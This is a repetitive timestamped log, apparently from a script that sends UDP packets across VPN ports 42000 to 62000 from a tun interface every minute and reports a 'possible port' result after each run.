+Starting port fill at 2020-09-06 14:47:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:47:06 +Starting port fill at 2020-09-06 14:48:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:48:06 +Starting port fill at 2020-09-06 14:49:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:49:04 +Starting port fill at 2020-09-06 14:50:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:50:06 +Starting port fill at 2020-09-06 14:51:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:51:05 +Starting port fill at 2020-09-06 14:52:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:52:04 +Starting port fill at 2020-09-06 14:53:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:53:04 +Starting port fill at 2020-09-06 14:54:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:54:04 +Starting port fill at 2020-09-06 14:55:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:55:06 +Starting port fill at 2020-09-06 14:56:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:56:05 +Starting port fill at 2020-09-06 14:57:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:57:05 +Starting port fill at 2020-09-06 14:58:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 14:58:06 +Starting port fill at 2020-09-06 14:59:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 14:59:07 +Starting port fill at 2020-09-06 15:00:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:00:05 +Starting port fill at 2020-09-06 15:01:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:01:06 +Starting port fill at 2020-09-06 15:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:02:06 +Starting port fill at 2020-09-06 15:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:03:06 +Starting port fill at 2020-09-06 15:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 15:04:06 +Starting port fill at 2020-09-06 15:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:05:04 +Starting port fill at 2020-09-06 15:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:06:04 +Starting port fill at 2020-09-06 15:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:07:05 +Starting port fill at 2020-09-06 15:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:08:04 +Starting port fill at 2020-09-06 15:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:09:05 +Starting port fill at 2020-09-06 15:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:10:04 +Starting port fill at 2020-09-06 15:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 15:11:06 +Starting port fill at 2020-09-06 15:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 